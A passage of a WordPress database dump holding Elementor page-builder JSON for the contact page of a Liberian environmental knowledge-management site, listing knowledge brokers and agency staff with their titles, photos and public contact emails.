href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager-CCCD Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>Monitoring, Control, and Surveillance Field Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>Small Scale Fisheries Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23488,3417,'_elementor_edit_mode','builder'),(23489,3417,'_elementor_template_type','wp-page'),(23490,3417,'_elementor_version','3.0.16'),(23491,3417,'_wp_page_template','default'),(23492,3417,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br 